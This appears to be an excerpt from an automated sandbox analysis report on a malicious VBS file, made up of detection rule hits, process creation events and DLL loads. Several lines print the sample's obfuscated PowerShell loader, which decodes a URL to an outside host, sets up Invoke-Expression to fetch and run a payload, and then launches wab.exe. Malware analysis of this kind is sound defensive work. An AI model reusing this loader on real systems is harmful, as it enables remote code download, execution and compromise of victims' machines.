              Source: amsi64_7772.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: amsi32_5824.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 5824, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@12/7@5/4
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Blanko.ProJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\EXwKoBFFWMorKcFJ
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tgxgobk3.rwg.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7772
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5824
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.vbsReversingLabs: Detection: 28%
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Firtallene = 1;$Aspergilla='Su';$Aspergilla+='bstrin';$Aspergilla+='g';Function Jammerklagen($Trykluftsapparaterne){$Dialogkort223agttagen=$Trykluftsapparaterne.Length-$Firtallene;For($Dialogkort223=5;$Dialogkort223 -lt $Dialogkort223agttagen;$Dialogkort223+=6){$Nettofortjeneste+=$Trykluftsapparaterne.$Aspergilla.Invoke( $Dialogkort223, $Firtallene);}$Nettofortjeneste;}function Nassedes($Bibliografers){. ($Herskabshuset) ($Bibliografers);}$Kirkegange=Jammerklagen 'UltraM atioInd.pz Gasai Ropelafsenl Kon,aStrer/Omsor5Sickl.Alan,0P,raf Walle(HumilWT,ssui Reson .ragdIkke,oSimilwSkrigsStift SkrivNovervTUnor. Har 1Soupi0Beskn.Sekar0Kalve; Mult ,oogaWTierciD.kkenPers 6Hardw4Twal.;Do,im Tonefx Ener6 efri4Abeka;Caboo MerskrUndervEspr.:Finge1preju2Keyse1 Tena.Skaer0Clogg)Nonfo Extr,GPoly,e N.tucMonoskFrounoOhmm /Shor 2Tyr.n0Dott 1Exten0 oder0Lsbla1Wha.v0Ple e1 Spyt At amF Empli.rocerSvedtechirmfDamp.oTribuxBlind/I.aer1Concr2S,ent1Ives.. Selv0Brnea ';$Hydrosalt223=Jammerklagen 'AgronUGarvnsWurtzeUnecorFawni- N,nnA ClumgStepuefloc nLandbtPains ';$Chalybean=Jammerklagen ' Skynhconspt Fla,tEaglepFausssH smo:slutt/under/halv,w NutgwDefinwKat e. Kl bsZarzueLunksnkunstdDrencs EmbipAfgi.aEkspocDe aieHedvi.bankrcVeneroExaggmReint/GuttepLinierpreezo .nde/trylld Penul ,dan/Frig,p nig p OverxAfideoEfterdForfam Pens ';$Microgramming=Jammerklagen ' .ebu> fbr ';$Herskabshuset=Jammerklagen 'FormkiFornye Ti exBank, ';$Nikkelets='Cikorieekstrakters';Nassedes (Jammerklagen 'TilenSRumm eCevittsparr-OversCBuxtooForbinOve ttSubcleCamounCanedtOvere Cardi-Un loPPseudaPr tetForsth Plea .atefT Card:Ty,og\ AdredSer,iiProbam sin.eAchennVasessli uru ,ilamSand,.,upletBackoxFouritAlrun Hyst- TvejV Li.ea flu.lMikr uHypere Asso photo$ PortNTordei,ndavkUdda.kNonfee,ftallT iazeVag,btO.kresSkrab; Abel ');Nassedes (Jammerklagen '.rsteiTerriftetan Waist(Tecovt TesseEkseksForbltpiker-unharp RecaaCalort KashhNysen ,lfacTKombi:Mulci\Moruld,onyaiJubjum Erhve F.lgnKonsts LagnuTubipm Fru,.AlloktVennexMugglt bagf)Ander{,ickeeMeadwx Non.iDisiltPrec }Viren;Tppe, ');$Unsolidifiable = Jammerklagen 'Fluttekar ocWarplhCharmoKoler pocy%AeoniaVogtep VarepSubindBumseaExcomtLae,ea ,erl%catar\ AgamBFaglolTyre,aSlutsnAmninkSp.erofluor. unmoPMariorChannoPhleb Misbe&Julet&sknhe Om,rbe,eisecF.rskhRe.itoBili. A,ce$finko ';Nassedes (Jammerklagen 'Veili$St legDyreblPa,mao ExtrbBestoa telil laa:WhirlLRaabaoSinisr semid SkylskoghewUndstiThickk ookeeB and=,rich(RecascenthumFi tsd gglu Genet/L,mpicUnder Under$PersoUTran,nRedefsFjernoUlderlSchiliU,stedUforniD urofasteristarta Lathb Dupel V,ate Pe,f)Diala ');Nassedes (Jammerklagen 'Fletn$ TerrgBe,zalRed,voMyndeb Att a In.ul Baga: BansMrenovaPastaaPaxilljockee nderrOver.uKontadG rtnsAntiet Ana.yKri.tr Spyt=Fl es$ BndsCStammhChartaSystelOrleayForvrbF leseLystoaCarvynMaxim.OmkrysArc iphipmolbu,eaimacultF ded(Yderk$ExtolMTintyiExtracKerstrTr ns
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Blanko.Pro && echo $"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Firtallene = 1;$Aspergilla='Su';$Aspergilla+='bstrin';$Aspergilla+='g';Function Jammerklagen($Trykluftsapparaterne){$Dialogkort223agttagen=$Trykluftsapparaterne.Length-$Firtallene;For($Dialogkort223=5;$Dialogkort223 -lt $Dialogkort223agttagen;$Dialogkort223+=6){$Nettofortjeneste+=$Trykluftsapparaterne.$Aspergilla.Invoke( $Dialogkort223, $Firtallene);}$Nettofortjeneste;}function Nassedes($Bibliografers){. ($Herskabshuset) ($Bibliografers);}$Kirkegange=Jammerklagen 'UltraM atioInd.pz Gasai Ropelafsenl Kon,aStrer/Omsor5Sickl.Alan,0P,raf Walle(HumilWT,ssui Reson .ragdIkke,oSimilwSkrigsStift SkrivNovervTUnor. Har 1Soupi0Beskn.Sekar0Kalve; Mult ,oogaWTierciD.kkenPers 6Hardw4Twal.;Do,im Tonefx Ener6 efri4Abeka;Caboo MerskrUndervEspr.:Finge1preju2Keyse1 Tena.Skaer0Clogg)Nonfo Extr,GPoly,e N.tucMonoskFrounoOhmm /Shor 2Tyr.n0Dott 1Exten0 oder0Lsbla1Wha.v0Ple e1 Spyt At amF Empli.rocerSvedtechirmfDamp.oTribuxBlind/I.aer1Concr2S,ent1Ives.. Selv0Brnea ';$Hydrosalt223=Jammerklagen 'AgronUGarvnsWurtzeUnecorFawni- N,nnA ClumgStepuefloc nLandbtPains ';$Chalybean=Jammerklagen ' Skynhconspt Fla,tEaglepFausssH smo:slutt/under/halv,w NutgwDefinwKat e. Kl bsZarzueLunksnkunstdDrencs EmbipAfgi.aEkspocDe aieHedvi.bankrcVeneroExaggmReint/GuttepLinierpreezo .nde/trylld Penul ,dan/Frig,p nig p OverxAfideoEfterdForfam Pens ';$Microgramming=Jammerklagen ' .ebu> fbr ';$Herskabshuset=Jammerklagen 'FormkiFornye Ti exBank, ';$Nikkelets='Cikorieekstrakters';Nassedes (Jammerklagen 'TilenSRumm eCevittsparr-OversCBuxtooForbinOve ttSubcleCamounCanedtOvere Cardi-Un loPPseudaPr tetForsth Plea .atefT Card:Ty,og\ AdredSer,iiProbam sin.eAchennVasessli uru ,ilamSand,.,upletBackoxFouritAlrun Hyst- TvejV Li.ea flu.lMikr uHypere Asso photo$ PortNTordei,ndavkUdda.kNonfee,ftallT iazeVag,btO.kresSkrab; Abel ');Nassedes (Jammerklagen '.rsteiTerriftetan Waist(Tecovt TesseEkseksForbltpiker-unharp RecaaCalort KashhNysen ,lfacTKombi:Mulci\Moruld,onyaiJubjum Erhve F.lgnKonsts LagnuTubipm Fru,.AlloktVennexMugglt bagf)Ander{,ickeeMeadwx Non.iDisiltPrec }Viren;Tppe, ');$Unsolidifiable = Jammerklagen 'Fluttekar ocWarplhCharmoKoler pocy%AeoniaVogtep VarepSubindBumseaExcomtLae,ea ,erl%catar\ AgamBFaglolTyre,aSlutsnAmninkSp.erofluor. unmoPMariorChannoPhleb Misbe&Julet&sknhe Om,rbe,eisecF.rskhRe.itoBili. A,ce$finko ';Nassedes (Jammerklagen 'Veili$St legDyreblPa,mao ExtrbBestoa telil laa:WhirlLRaabaoSinisr semid SkylskoghewUndstiThickk ookeeB and=,rich(RecascenthumFi tsd gglu Genet/L,mpicUnder Under$PersoUTran,nRedefsFjernoUlderlSchiliU,stedUforniD urofasteristarta Lathb Dupel V,ate Pe,f)Diala ');Nassedes (Jammerklagen 'Fletn$ TerrgBe,zalRed,voMyndeb Att a In.ul Baga: BansMrenovaPastaaPaxilljockee nderrOver.uKontadG rtnsAntiet Ana.yKri.tr Spyt=Fl es$ BndsCStammhChartaSystelOrleayForvrbF leseLystoaCarvynMaxim.OmkrysArc iphipmolbu,eaimacultF ded(Yderk$ExtolMTintyiExtracKerstrTr ns
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Blanko.Pro && echo $"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Firtallene = 1;$Aspergilla='Su';$Aspergilla+='bstrin';$Aspergilla+='g';Function Jammerklagen($Trykluftsapparaterne){$Dialogkort223agttagen=$Trykluftsapparaterne.Length-$Firtallene;For($Dialogkort223=5;$Dialogkort223 -lt $Dialogkort223agttagen;$Dialogkort223+=6){$Nettofortjeneste+=$Trykluftsapparaterne.$Aspergilla.Invoke( $Dialogkort223, $Firtallene);}$Nettofortjeneste;}function Nassedes($Bibliografers){. ($Herskabshuset) ($Bibliografers);}$Kirkegange=Jammerklagen 'UltraM atioInd.pz Gasai Ropelafsenl Kon,aStrer/Omsor5Sickl.Alan,0P,raf Walle(HumilWT,ssui Reson .ragdIkke,oSimilwSkrigsStift SkrivNovervTUnor. Har 1Soupi0Beskn.Sekar0Kalve; Mult ,oogaWTierciD.kkenPers 6Hardw4Twal.;Do,im Tonefx Ener6 efri4Abeka;Caboo MerskrUndervEspr.:Finge1preju2Keyse1 Tena.Skaer0Clogg)Nonfo Extr,GPoly,e N.tucMonoskFrounoOhmm /Shor 2Tyr.n0Dott 1Exten0 oder0Lsbla1Wha.v0Ple e1 Spyt At amF Empli.rocerSvedtechirmfDamp.oTribuxBlind/I.aer1Concr2S,ent1Ives.. Selv0Brnea ';$Hydrosalt223=Jammerklagen 'AgronUGarvnsWurtzeUnecorFawni- N,nnA ClumgStepuefloc nLandbtPains ';$Chalybean=Jammerklagen ' Skynhconspt Fla,tEaglepFausssH smo:slutt/under/halv,w NutgwDefinwKat e. Kl bsZarzueLunksnkunstdDrencs EmbipAfgi.aEkspocDe aieHedvi.bankrcVeneroExaggmReint/GuttepLinierpreezo .nde/trylld Penul ,dan/Frig,p nig p OverxAfideoEfterdForfam Pens ';$Microgramming=Jammerklagen ' .ebu> fbr ';$Herskabshuset=Jammerklagen 'FormkiFornye Ti exBank, ';$Nikkelets='Cikorieekstrakters';Nassedes (Jammerklagen 'TilenSRumm eCevittsparr-OversCBuxtooForbinOve ttSubcleCamounCanedtOvere Cardi-Un loPPseudaPr tetForsth Plea .atefT Card:Ty,og\ AdredSer,iiProbam sin.eAchennVasessli uru ,ilamSand,.,upletBackoxFouritAlrun Hyst- TvejV Li.ea flu.lMikr uHypere Asso photo$ PortNTordei,ndavkUdda.kNonfee,ftallT iazeVag,btO.kresSkrab; Abel ');Nassedes (Jammerklagen '.rsteiTerriftetan Waist(Tecovt TesseEkseksForbltpiker-unharp RecaaCalort KashhNysen ,lfacTKombi:Mulci\Moruld,onyaiJubjum Erhve F.lgnKonsts LagnuTubipm Fru,.AlloktVennexMugglt bagf)Ander{,ickeeMeadwx Non.iDisiltPrec }Viren;Tppe, ');$Unsolidifiable = Jammerklagen 'Fluttekar ocWarplhCharmoKoler pocy%AeoniaVogtep VarepSubindBumseaExcomtLae,ea ,erl%catar\ AgamBFaglolTyre,aSlutsnAmninkSp.erofluor. unmoPMariorChannoPhleb Misbe&Julet&sknhe Om,rbe,eisecF.rskhRe.itoBili. A,ce$finko ';Nassedes (Jammerklagen 'Veili$St legDyreblPa,mao ExtrbBestoa telil laa:WhirlLRaabaoSinisr semid SkylskoghewUndstiThickk ookeeB and=,rich(RecascenthumFi tsd gglu Genet/L,mpicUnder Under$PersoUTran,nRedefsFjernoUlderlSchiliU,stedUforniD urofasteristarta Lathb Dupel V,ate Pe,f)Diala ');Nassedes (Jammerklagen 'Fletn$ TerrgBe,zalRed,voMyndeb Att a In.ul Baga: BansMrenovaPastaaPaxilljockee nderrOver.uKontadG rtnsAntiet Ana.yKri.tr Spyt=Fl es$ BndsCStammhChartaSystelOrleayForvrbF leseLystoaCarvynMaxim.OmkrysArc iphipmolbu,eaimacultF ded(Yderk$ExtolMTintyiExtracKerstrTr nsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Blanko.Pro && echo $"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Firtallene = 1;$Aspergilla='Su';$Aspergilla+='bstrin';$Aspergilla+='g';Function Jammerklagen($Trykluftsapparaterne){$Dialogkort223agttagen=$Trykluftsapparaterne.Length-$Firtallene;For($Dialogkort223=5;$Dialogkort223 -lt $Dialogkort223agttagen;$Dialogkort223+=6){$Nettofortjeneste+=$Trykluftsapparaterne.$Aspergilla.Invoke( $Dialogkort223, $Firtallene);}$Nettofortjeneste;}function Nassedes($Bibliografers){. ($Herskabshuset) ($Bibliografers);}$Kirkegange=Jammerklagen 'UltraM atioInd.pz Gasai Ropelafsenl Kon,aStrer/Omsor5Sickl.Alan,0P,raf Walle(HumilWT,ssui Reson .ragdIkke,oSimilwSkrigsStift SkrivNovervTUnor. Har 1Soupi0Beskn.Sekar0Kalve; Mult ,oogaWTierciD.kkenPers 6Hardw4Twal.;Do,im Tonefx Ener6 efri4Abeka;Caboo MerskrUndervEspr.:Finge1preju2Keyse1 Tena.Skaer0Clogg)Nonfo Extr,GPoly,e N.tucMonoskFrounoOhmm /Shor 2Tyr.n0Dott 1Exten0 oder0Lsbla1Wha.v0Ple e1 Spyt At amF Empli.rocerSvedtechirmfDamp.oTribuxBlind/I.aer1Concr2S,ent1Ives.. Selv0Brnea ';$Hydrosalt223=Jammerklagen 'AgronUGarvnsWurtzeUnecorFawni- N,nnA ClumgStepuefloc nLandbtPains ';$Chalybean=Jammerklagen ' Skynhconspt Fla,tEaglepFausssH smo:slutt/under/halv,w NutgwDefinwKat e. Kl bsZarzueLunksnkunstdDrencs EmbipAfgi.aEkspocDe aieHedvi.bankrcVeneroExaggmReint/GuttepLinierpreezo .nde/trylld Penul ,dan/Frig,p nig p OverxAfideoEfterdForfam Pens ';$Microgramming=Jammerklagen ' .ebu> fbr ';$Herskabshuset=Jammerklagen 'FormkiFornye Ti exBank, ';$Nikkelets='Cikorieekstrakters';Nassedes (Jammerklagen 'TilenSRumm eCevittsparr-OversCBuxtooForbinOve ttSubcleCamounCanedtOvere Cardi-Un loPPseudaPr tetForsth Plea .atefT Card:Ty,og\ AdredSer,iiProbam sin.eAchennVasessli uru ,ilamSand,.,upletBackoxFouritAlrun Hyst- TvejV Li.ea flu.lMikr uHypere Asso photo$ PortNTordei,ndavkUdda.kNonfee,ftallT iazeVag,btO.kresSkrab; Abel ');Nassedes (Jammerklagen '.rsteiTerriftetan Waist(Tecovt TesseEkseksForbltpiker-unharp RecaaCalort KashhNysen ,lfacTKombi:Mulci\Moruld,onyaiJubjum Erhve F.lgnKonsts LagnuTubipm Fru,.AlloktVennexMugglt bagf)Ander{,ickeeMeadwx Non.iDisiltPrec }Viren;Tppe, ');$Unsolidifiable = Jammerklagen 'Fluttekar ocWarplhCharmoKoler pocy%AeoniaVogtep VarepSubindBumseaExcomtLae,ea ,erl%catar\ AgamBFaglolTyre,aSlutsnAmninkSp.erofluor. unmoPMariorChannoPhleb Misbe&Julet&sknhe Om,rbe,eisecF.rskhRe.itoBili. A,ce$finko ';Nassedes (Jammerklagen 'Veili$St legDyreblPa,mao ExtrbBestoa telil laa:WhirlLRaabaoSinisr semid SkylskoghewUndstiThickk ookeeB and=,rich(RecascenthumFi tsd gglu Genet/L,mpicUnder Under$PersoUTran,nRedefsFjernoUlderlSchiliU,stedUforniD urofasteristarta Lathb Dupel V,ate Pe,f)Diala ');Nassedes (Jammerklagen 'Fletn$ TerrgBe,zalRed,voMyndeb Att a In.ul Baga: BansMrenovaPastaaPaxilljockee nderrOver.uKontadG rtnsAntiet Ana.yKri.tr Spyt=Fl es$ BndsCStammhChartaSystelOrleayForvrbF leseLystoaCarvynMaxim.OmkrysArc iphipmolbu,eaimacultF ded(Yderk$ExtolMTintyiExtracKerstrTr nsJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Blanko.Pro && echo $"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
